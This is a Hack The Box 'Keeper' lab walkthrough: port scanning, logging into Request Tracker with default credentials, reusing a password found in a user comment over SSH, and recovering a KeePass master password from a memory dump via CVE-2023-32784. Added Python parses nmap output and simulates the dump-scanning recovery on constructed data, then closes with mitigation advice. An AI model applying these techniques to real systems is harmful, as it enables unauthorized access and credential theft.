Keeper
February 03, 2025
Created by: knightmare
Page: Hack The Box
Difficulty: Easy
OS: Linux

The first step is to scan for open ports and then enumerate the versions and technologies running on them.

    nmap -p- --open -vvv --min-rate 3000 -sS -Pn 10.10.11.227 -oG scan
    /opt/extractports scan
    nmap -p22,80 -Pn -sCV 10.10.11.227 -oN ports

When I open the web site it shows me a subdomain, which I add to the hosts file. On the subdomain I find the "Request Tracker" CMS. Searching for information I find the default credentials root:password, and when I test them I manage to log in. Once inside I find a single ticket, but after investigating it I can't get anything out of it. I continue looking at the users, and in one of them I find a comment that contains a password. I try to connect via SSH with that user and the password found, and I manage to access the system and read the first flag.

    ssh lnorgaard@10.10.11.227

In the root directory I find a zip file containing a memory dump taken while KeePass was running and the KeePass database in question. Searching for information about this I find CVE-2023-32784, which allows recovering the master password of the database, or part of it, from that dump. I find a PoC that shows me part of the characters:

    dotnet run C:\Users\rufo\Downloads\KeePassDumpFull.dmp

I create a dictionary that contains a wide variety of characters in the first position and, in the second position, only those shown in the program output. Thanks to this I find the correct password and open the KeePass file. Inside I find a PuTTY key that allows connecting as root to the system. Thanks to this I access the system and read the second flag.
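The two-step scan in the write-up (a full-port discovery written in grepable format, then a targeted -sCV scan of only the ports found) depends on pulling the open ports out of the -oG file. The /opt/extractports script the author uses is not shown, so the following added Python is my own stand-in for that step, not the author's script: it parses a constructed grepable-output sample, assumed to follow nmap's `Host: ... Ports: port/state/proto//service///` layout, keeps only entries in the open state, and emits the comma-separated list that the second nmap command takes with -p. The sample includes a filtered entry, which a real --open scan would not print, purely to show that non-open states are dropped.

```python
import re

# Constructed sample of `nmap -oG` (grepable) output for the scan in the
# write-up; assumed to match nmap 7.x's format, not the author's real file.
SAMPLE_GNMAP = """# Nmap 7.94 scan initiated Mon Feb  3 10:00:00 2025 as: nmap -p- --open -sS -Pn 10.10.11.227 -oG scan
Host: 10.10.11.227 ()\tStatus: Up
Host: 10.10.11.227 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/filtered/tcp//https///\tIgnored State: closed (65532)
# Nmap done at Mon Feb  3 10:00:30 2025 -- 1 IP address (1 host up) scanned in 30.00 seconds
"""

# One grepable port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, service), ...]} keeping open ports only."""
    results = {}
    for line in text.splitlines():
        # Only the "Host:" lines that carry a "Ports:" field list services.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:")[1].split("\t")[0]
        open_ports = []
        for match in PORT_RE.finditer(ports_field):
            port, state, proto, service = match.groups()
            if state == "open":
                open_ports.append((int(port), proto, service))
        results.setdefault(host, []).extend(open_ports)
    return results


def port_list(results, host):
    """Comma-separated ports for a host, ready for the follow-up `nmap -p`."""
    return ",".join(str(p) for p, _, _ in sorted(results.get(host, [])))


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for host, entries in scan.items():
        print(host, entries)
        print("nmap -p" + port_list(scan, host) + " -Pn -sCV " + host)
```

Run it on a real file with `parse_gnmap(open("scan").read())`; the `port_list` string is exactly what the write-up's second command passes as `-p22,80`.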
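The CVE-2023-32784 step is worth understanding rather than just running: KeePass 2.x before 2.54 (the release that fixed it) masked the master password box with the bullet character, and every keystroke created a new managed string made of one bullet per previously typed character plus the character just typed. Those strings linger in the process heap, so a memory dump, a pagefile or a hibernation file taken while the box was in use contains the password from the second character onward, while the first character, which was never paired with a bullet, is not recoverable. That is exactly why the write-up's dictionary varies only the first position. The following added Python, which is not the author's PoC nor KeePass code, simulates the leak on a constructed password and constructed heap filler, scans the fake dump the way a forensic check for this exposure would, and then measures how much of the password's search space the leak removed. On a real dump, stray bullet-plus-character fragments add extra candidates for a position, which is why the recovery keeps a set per position instead of a single character.

```python
import itertools
import string

# KeePass 2.x (before 2.54, which fixed CVE-2023-32784) masked the master
# password box with this bullet; each keystroke left a managed string
# "<one bullet per earlier char><typed char>" behind in the heap.
BULLET = "\u25cf"

# Constructed demo password; not the one from the box.
DEMO_PASSWORD = "Kr0ket#9"

# Constructed heap filler, chosen to contain no UTF-16LE bullet bytes.
FILLER = b"\x00" * 8 + b"unrelated-heap-data" + b"\x00" * 8

# Characters tried in position 1, the one the dump never reveals (94 symbols).
FIRST_CHARSET = string.ascii_letters + string.digits + string.punctuation


def simulate_leftovers(typed):
    """Strings the vulnerable text box left behind while `typed` was entered.

    Typing the i-th character (0-based) produces i bullets plus that
    character, so the first character is never paired with a bullet marker.
    """
    return [BULLET * i + ch for i, ch in enumerate(typed)]


def build_fake_dump(leftovers):
    """Lay the leftover strings out as .NET stores them (UTF-16LE), with filler."""
    chunks = [FILLER]
    for s in leftovers:
        chunks.append(s.encode("utf-16-le"))
        chunks.append(FILLER)
    return b"".join(chunks)


def recover_from_dump(dump):
    """Scan a dump for bullet runs followed by one printable UTF-16 code unit.

    Returns {position (1-based): set of candidate characters}. Position 1 is
    never present, which is why the write-up brute-forces it.
    """
    bullet = BULLET.encode("utf-16-le")
    found = {}
    i = 0
    while i < len(dump) - 1:
        if dump[i:i + 2] != bullet:
            i += 1
            continue
        run = 0
        while dump[i:i + 2] == bullet:
            run += 1
            i += 2
        nxt = dump[i:i + 2].decode("utf-16-le", errors="ignore")
        if nxt and nxt.isprintable():
            found.setdefault(run + 1, set()).add(nxt)
    return found


def residual_search_space(found, length, first_charset=FIRST_CHARSET):
    """Number of candidates left once the dump has been mined.

    This is the size of the dictionary the write-up builds: every character of
    `first_charset` in position 1 and only the recovered candidates elsewhere.
    """
    total = len(first_charset)
    for pos in range(2, length + 1):
        if pos not in found:
            return None  # a position absent from the dump cannot be filled in
        total *= len(found[pos])
    return total


def candidate_passwords(found, length, first_charset=FIRST_CHARSET):
    """Expand the same slots into the actual wordlist (small spaces only)."""
    slots = [sorted(first_charset)]
    for pos in range(2, length + 1):
        if pos not in found:
            return []
        slots.append(sorted(found[pos]))
    return ["".join(p) for p in itertools.product(*slots)]


if __name__ == "__main__":
    dump = build_fake_dump(simulate_leftovers(DEMO_PASSWORD))
    found = recover_from_dump(dump)
    for pos in sorted(found):
        print("position", pos, "candidates:", "".join(sorted(found[pos])))
    print("candidates left:", residual_search_space(found, len(DEMO_PASSWORD)))
```

For the eight-character demo password the leak collapses the search from 94^8 to 94 candidates, which is the whole reason the write-up's small dictionary works. The mitigation side is straightforward: KeePass 2.54 or later, and treating any memory dump, crash dump or hibernation file from a host where an older version ran as if it contained the master password.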